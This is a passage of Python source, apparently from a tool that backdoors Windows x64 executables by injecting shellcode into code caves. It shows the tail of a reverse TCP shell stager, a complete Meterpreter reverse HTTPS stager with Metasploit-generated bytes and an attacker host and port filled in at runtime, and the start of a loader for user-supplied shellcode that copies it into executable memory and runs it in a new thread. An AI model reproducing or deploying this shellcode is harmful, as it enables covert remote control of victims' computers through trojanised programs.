"\x58" # pop rax ; Pop off the current (now the previous) modules EAT
# get_next_mod1:
"\x41\x59" # pop r9 ; Pop off the current (now the previous) modules hash
"\x5A" # pop rdx ; Restore our position in the module list
"\x48\x8B\x12" # mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module
)
# allocate
self.shellcode1 += ("\x5d" # pop rbp
"\x49\xc7\xc6\xab\x01\x00\x00" # mov r14, 1abh size of payload
"\x6a\x40" # push 40h
"\x41\x59" # pop r9 now 40h
"\x68\x00\x10\x00\x00" # push 1000h
"\x41\x58" # pop r8.. now 1000h
"\x4C\x89\xF2" # mov rdx, r14
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x68\x58\xa4\x53\xe5" # push E553a458
"\x41\x5A" # pop r10
"\xff\xd5" # call rbp
"\x48\x89\xc3" # mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address
"\x48\xC7\xC1\xAB\x01\x00\x00" # mov rcx, 0x1ab
)
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x43"
# got_payload:
self.shellcode1 += ("\x5e" # pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" # rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" # call set_handler ; Configure error handling
#Not Used... :/ Can probably live without..
#exitfunk:
#"\x48\xC7\xC3\xE0\x1D\x2A\x0A" # mov rbx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
#"\x68\xa6\x95\xbd\x9d" # push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
#"\xFF\xD5" # call rbp ; GetVersion(); (AL will = major version and AH will = minor version)
#"\x3C\x06" # cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
#"\x7c\x0a" # jl goodbye ; Then just call the exit function...
#"\x80\xFB\xE0" # cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
#"\x75\x05" # jne goodbye ;
#"\x48\xC7\xC3\x47\x13\x72\x6F" # mov rbx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
# goodbye: ; We now perform the actual call to the exit function
#"\x6A\x00" # push byte 0 ; push the exit function parameter
#"\x53" # push rbx ; push the hash of the exit function
#"\xFF\xD5" # call rbp ; call EXITFUNK( 0 );
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" # mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
"\xFF\xD5" # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" # add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
self.shellcode1 += "\xE9\xab\x01\x00\x00"
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 244).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
"""
shellcode2
/*
* windows/x64/shell/reverse_tcp - 422 bytes (stage 1)
^^windows/x64/meterpreter/reverse_tcp will work with this
* http://www.metasploit.com
* VERBOSE=false, LHOST=127.0.0.1, LPORT=8080,
* ReverseConnectRetries=5, ReverseListenerBindPort=0,
* ReverseAllowProxy=false, EnableStageEncoding=false,
* PrependMigrate=false, EXITFUNC=thread,
* InitialAutoRunScript=, AutoRunScript=
*/
"""
#payload
self.shellcode2 += ("\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00"
#"\x1f\x90"
#"\x7f\x00\x00\x01"
)
self.shellcode2 += struct.pack('!h', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x48\x83\xec"
"\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9\x41"
"\xba\x02\xd9\xc8\x5f\xff\xd5\x48\x83\xc4\x20\x5e\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41"
"\xff\xe7"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def meterpreter_reverse_https(self, flItms, CavesPicked={}):
"""
Win64 version
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
flItms['stager'] = True
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ( "\x90" #<--THAT'S A NOP. \o/
"\xe8\xc0\x00\x00\x00" #jmp to allocate
#api_call
"\x41\x51" #push r9
"\x41\x50" #push r8
"\x52" #push rdx
"\x51" #push rcx
"\x56" #push rsi
"\x48\x31\xD2" #xor rdx,rdx
"\x65\x48\x8B\x52\x60" #mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" #mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" #mov rdx,qword ptr[rdx+32]
#next_mod
"\x48\x8b\x72\x50" #mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" #movzx rcx,word [rdx+74]
"\x4d\x31\xc9" #xor r9,r9
#loop_modname
"\x48\x31\xc0" #xor rax,rax
"\xac" #lods
"\x3c\x61" #cmp al, 61h (a)
"\x7c\x02" #jl 02
"\x2c\x20" #sub al, 0x20
#not_lowercase
"\x41\xc1\xc9\x0d" #ror r9d, 13
"\x41\x01\xc1" #add r9d, eax
"\xe2\xed" #loop until read, back to xor rax, rax
"\x52" #push rdx ; Save the current position in the module list for later
"\x41\x51" #push r9 ; Save the current module hash for later
                                           #; Proceed to iterate the export address table,
"\x48\x8b\x52\x20" #mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" #mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" #add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" #mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" #test rax, rax ; Test if no export address table is present
"\x74\x67" #je get_next_mod1 ; If no EAT present, process the next module
"\x48\x01\xd0" #add rax, rdx ; Add the modules base address
"\x50" #push rax ; Save the current modules EAT
"\x8b\x48\x18" #mov ecx, dword [rax+24] ; Get the number of function names
"\x44\x8b\x40\x20" #mov r8d, dword [rax+32] ; Get the rva of the function names
"\x49\x01\xd0" #add r8, rdx ; Add the modules base address
#; Computing the module hash + function hash
#get_next_func: ;
"\xe3\x56" #jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
"\x48\xff\xc9" # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" # xor r9, r9 ; Clear r9 which will store the hash of the function name
                                           # ; And compare it to the one we want
#loop_funcname: ;
"\x48\x31\xc0" #xor rax, rax ; Clear rax
"\xac" #lodsb ; Read in the next byte of the ASCII function name
"\x41\xc1\xc9\x0d" #ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" #add r9d, eax ; Add the next byte of the name
"\x38\xe0" #cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
"\x75\xf1" #jne loop_funcname ; If we have not reached the null terminator, continue
"\x4c\x03\x4c\x24\x08" #add r9, [rsp+8] ; Add the current module hash to the function hash
"\x45\x39\xd1" #cmp r9d, r10d ; Compare the hash to the one we are searchnig for
"\x75\xd8" #jnz get_next_func ; Go compute the next function hash if we have not found it
#; If found, fix up stack, call the function and then value else compute the next one...
"\x58" #pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" #mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" #add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" #mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" #mov r8d, dword [rax+28] ; Get the function addresses table rva
"\x49\x01\xd0" #add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" #mov eax, dword [r8+4*rcx]; Get the desired functions RVA
"\x48\x01\xd0" #add rax, rdx ; Add the modules base address to get the functions actual VA
                                           #; We now fix up the stack and perform the call to the desired function...
#finish:
"\x41\x58" #pop r8 ; Clear off the current modules hash
"\x41\x58" #pop r8 ; Clear off the current position in the module list
"\x5E" #pop rsi ; Restore RSI
"\x59" #pop rcx ; Restore the 1st parameter
"\x5A" #pop rdx ; Restore the 2nd parameter
"\x41\x58" #pop r8 ; Restore the 3rd parameter
"\x41\x59" #pop r9 ; Restore the 4th parameter
"\x41\x5A" #pop r10 ; pop off the return address
"\x48\x83\xEC\x20" #sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
# ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
"\x41\x52" #push r10 ; push back the return address
"\xFF\xE0" #jmp rax ; Jump into the required function
#; We now automagically return to the correct caller...
#get_next_mod: ;
"\x58" #pop rax ; Pop off the current (now the previous) modules EAT
#get_next_mod1: ;
"\x41\x59" #pop r9 ; Pop off the current (now the previous) modules hash
"\x5A" #pop rdx ; Restore our position in the module list
"\x48\x8B\x12" #mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" #jmp next_mod ; Process this module
)
self.shellcode1 += (#allocate
"\x5d" #pop rbp
"\x49\xc7\xc6" #mov r14, 1abh size of payload...
)
self.shellcode1 += struct.pack("<H", 583 + len(self.HOST))
self.shellcode1 += ("\x00\x00"
"\x6a\x40" #push 40h
"\x41\x59" #pop r9 now 40h
"\x68\x00\x10\x00\x00" #push 1000h
"\x41\x58" #pop r8.. now 1000h
"\x4C\x89\xF2" #mov rdx, r14
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x68\x58\xa4\x53\xe5" #push E553a458
"\x41\x5A" #pop r10
"\xff\xd5" #call rbp
"\x48\x89\xc3" #mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" #mov rdi, rax ; Prepare EDI with the new address
)
#mov rcx, 0x1abE
self.shellcode1 += "\x48\xc7\xc1"
self.shellcode1 += struct.pack("<H", 583 + len(self.HOST))
self.shellcode1 += "\x00\x00"
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x43"
# got_payload:
self.shellcode1 += ( "\x5e" #pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" #rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" #call set_handler ; Configure error handling
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" #mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" #mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" #mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" #mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
"\xFF\xD5" # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" #add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
self.shellcode1 += "\xE9"
self.shellcode1 += struct.pack("<H", 583 + len(self.HOST))
self.shellcode1 += "\x00\x00"
#self.shellcode1 += "\xE9\x47\x02\x00\x00"
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 244).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
"""
/*
* windows/x64/meterpreter/reverse_https - 587 bytes (stage 1)
* http://www.metasploit.com
* VERBOSE=false, LHOST=127.0.0.1, LPORT=8080,
* SessionExpirationTimeout=604800,
* SessionCommunicationTimeout=300,
* MeterpreterUserAgent=Mozilla/4.0 (compatible; MSIE 6.1;
* Windows NT), MeterpreterServerName=Apache,
* ReverseListenerBindPort=0,
* HttpUnknownRequestResponse=<html><body><h1>It
* works!</h1></body></html>, EnableStageEncoding=false,
* PrependMigrate=false, EXITFUNC=thread, AutoLoadStdapi=true,
* InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true,
* EnableUnicodeEncoding=true
*/
"""
#payload
self.shellcode2 += ("\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00"
"\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b"
"\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b"
"\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41"
"\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41"
"\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff"
"\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56"
"\x49\x89\xe6\x4c\x89\xf1\x49\xba\x4c\x77\x26\x07\x00\x00\x00"
"\x00\xff\xd5\x6a\x00\x6a\x00\x48\x89\xe1\x48\x31\xd2\x4d\x31"
"\xc0\x4d\x31\xc9\x41\x50\x41\x50\x49\xba\x3a\x56\x79\xa7\x00"
"\x00\x00\x00\xff\xd5\xe9\x9e\x00\x00\x00\x5a\x48\x89\xc1\x49"
"\xb8")
self.shellcode2 += struct.pack("<h", self.PORT)
self.shellcode2 += ("\x00\x00\x00\x00\x00\x00\x4d\x31\xc9\x41\x51\x41"
"\x51\x6a\x03\x41\x51\x49\xba\x57\x89\x9f\xc6\x00\x00\x00\x00"
"\xff\xd5\xeb\x7c\x48\x89\xc1\x48\x31\xd2\x41\x58\x4d\x31\xc9"
"\x52\x68\x00\x32\xa0\x84\x52\x52\x49\xba\xeb\x55\x2e\x3b\x00"
"\x00\x00\x00\xff\xd5\x48\x89\xc6\x6a\x0a\x5f\x48\x89\xf1\x48"
"\xba\x1f\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x68\x80\x33\x00"
"\x00\x49\x89\xe0\x49\xb9\x04\x00\x00\x00\x00\x00\x00\x00\x49"
"\xba\x75\x46\x9e\x86\x00\x00\x00\x00\xff\xd5\x48\x89\xf1\x48"
"\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x52\x52\x49\xba\x2d\x06\x18"
"\x7b\x00\x00\x00\x00\xff\xd5\x85\xc0\x75\x24\x48\xff\xcf\x74"
"\x13\xeb\xb1\xe9\x81\x00\x00\x00\xe8\x7f\xff\xff\xff\x2f\x75"
"\x47\x48\x58\x00\x00\x49\xbe\xf0\xb5\xa2\x56\x00\x00\x00\x00"
"\xff\xd5\x48\x31\xc9\x48\xba\x00\x00\x40\x00\x00\x00\x00\x00"
"\x49\xb8\x00\x10\x00\x00\x00\x00\x00\x00\x49\xb9\x40\x00\x00"
"\x00\x00\x00\x00\x00\x49\xba\x58\xa4\x53\xe5\x00\x00\x00\x00"
"\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda"
"\x49\xb8\x00\x20\x00\x00\x00\x00\x00\x00\x49\x89\xf9\x49\xba"
"\x12\x96\x89\xe2\x00\x00\x00\x00\xff\xd5\x48\x83\xc4\x20\x85"
"\xc0\x74\x99\x48\x8b\x07\x48\x01\xc3\x48\x85\xc0\x75\xce\x58"
"\x58\xc3\xe8\xd7\xfe\xff\xff")
self.shellcode2 += self.HOST
self.shellcode2 += "\x00"
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def user_supplied_shellcode(self, flItms, CavesPicked={}):
"""
User supplies the shellcode, make sure that it EXITs via a thread.
"""
flItms['stager'] = True
if flItms['supplied_shellcode'] is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ( "\x90" #<--THAT'S A NOP. \o/
"\xe8\xc0\x00\x00\x00" #jmp to allocate
#api_call
"\x41\x51" #push r9
"\x41\x50" #push r8
"\x52" #push rdx
"\x51" #push rcx
"\x56" #push rsi
"\x48\x31\xD2" #xor rdx,rdx
"\x65\x48\x8B\x52\x60" #mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" #mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" #mov rdx,qword ptr[rdx+32]
#next_mod
"\x48\x8b\x72\x50" #mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" #movzx rcx,word [rdx+74]
"\x4d\x31\xc9" #xor r9,r9
#loop_modname
"\x48\x31\xc0" #xor rax,rax
"\xac" #lods
"\x3c\x61" #cmp al, 61h (a)
"\x7c\x02" #jl 02
"\x2c\x20" #sub al, 0x20
#not_lowercase
"\x41\xc1\xc9\x0d" #ror r9d, 13
"\x41\x01\xc1" #add r9d, eax
"\xe2\xed" #loop until read, back to xor rax, rax
"\x52" #push rdx ; Save the current position in the module list for later
"\x41\x51" #push r9 ; Save the current module hash for later
                                           #; Proceed to iterate the export address table,
"\x48\x8b\x52\x20" #mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" #mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" #add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" #mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" #test rax, rax ; Test if no export address table is present
"\x74\x67" #je get_next_mod1 ; If no EAT present, process the next module
"\x48\x01\xd0" #add rax, rdx ; Add the modules base address
"\x50" #push rax ; Save the current modules EAT
"\x8b\x48\x18" #mov ecx, dword [rax+24] ; Get the number of function names
"\x44\x8b\x40\x20" #mov r8d, dword [rax+32] ; Get the rva of the function names
"\x49\x01\xd0" #add r8, rdx ; Add the modules base address
#; Computing the module hash + function hash
#get_next_func: ;
"\xe3\x56" #jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
"\x48\xff\xc9" # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" # xor r9, r9 ; Clear r9 which will store the hash of the function name
                                           # ; And compare it to the one we want
#loop_funcname: ;
"\x48\x31\xc0" #xor rax, rax ; Clear rax
"\xac" #lodsb ; Read in the next byte of the ASCII function name
"\x41\xc1\xc9\x0d" #ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" #add r9d, eax ; Add the next byte of the name
"\x38\xe0" #cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
"\x75\xf1" #jne loop_funcname ; If we have not reached the null terminator, continue
"\x4c\x03\x4c\x24\x08" #add r9, [rsp+8] ; Add the current module hash to the function hash
"\x45\x39\xd1" #cmp r9d, r10d ; Compare the hash to the one we are searchnig for
"\x75\xd8" #jnz get_next_func ; Go compute the next function hash if we have not found it
#; If found, fix up stack, call the function and then value else compute the next one...
"\x58" #pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" #mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" #add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" #mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" #mov r8d, dword [rax+28] ; Get the function addresses table rva
"\x49\x01\xd0" #add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" #mov eax, dword [r8+4*rcx]; Get the desired functions RVA
"\x48\x01\xd0" #add rax, rdx ; Add the modules base address to get the functions actual VA
                                           #; We now fix up the stack and perform the call to the desired function...
#finish:
"\x41\x58" #pop r8 ; Clear off the current modules hash
"\x41\x58" #pop r8 ; Clear off the current position in the module list
"\x5E" #pop rsi ; Restore RSI
"\x59" #pop rcx ; Restore the 1st parameter
"\x5A" #pop rdx ; Restore the 2nd parameter
"\x41\x58" #pop r8 ; Restore the 3rd parameter
"\x41\x59" #pop r9 ; Restore the 4th parameter
"\x41\x5A" #pop r10 ; pop off the return address
"\x48\x83\xEC\x20" #sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
# ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
"\x41\x52" #push r10 ; push back the return address
"\xFF\xE0" #jmp rax ; Jump into the required function
#; We now automagically return to the correct caller...
#get_next_mod: ;
"\x58" #pop rax ; Pop off the current (now the previous) modules EAT
#get_next_mod1: ;
"\x41\x59" #pop r9 ; Pop off the current (now the previous) modules hash
"\x5A" #pop rdx ; Restore our position in the module list
"\x48\x8B\x12" #mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" #jmp next_mod ; Process this module
)
self.shellcode1 += (#allocate
"\x5d" #pop rbp
"\x49\xc7\xc6" #mov r14, 1abh size of payload...
)
self.shellcode1 += struct.pack("<H", len(self.supplied_shellcode))
self.shellcode1 += ("\x00\x00"
"\x6a\x40" #push 40h
"\x41\x59" #pop r9 now 40h
"\x68\x00\x10\x00\x00" #push 1000h
"\x41\x58" #pop r8.. now 1000h
"\x4C\x89\xF2" #mov rdx, r14
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x68\x58\xa4\x53\xe5" #push E553a458
"\x41\x5A" #pop r10
"\xff\xd5" #call rbp
"\x48\x89\xc3" #mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" #mov rdi, rax ; Prepare EDI with the new address
)
##mov rcx, 0x1ab
self.shellcode1 += "\x48\xc7\xc1"
self.shellcode1 += struct.pack("<H", len(self.supplied_shellcode))
self.shellcode1 += "\x00\x00"
#call the get_payload right before the payload
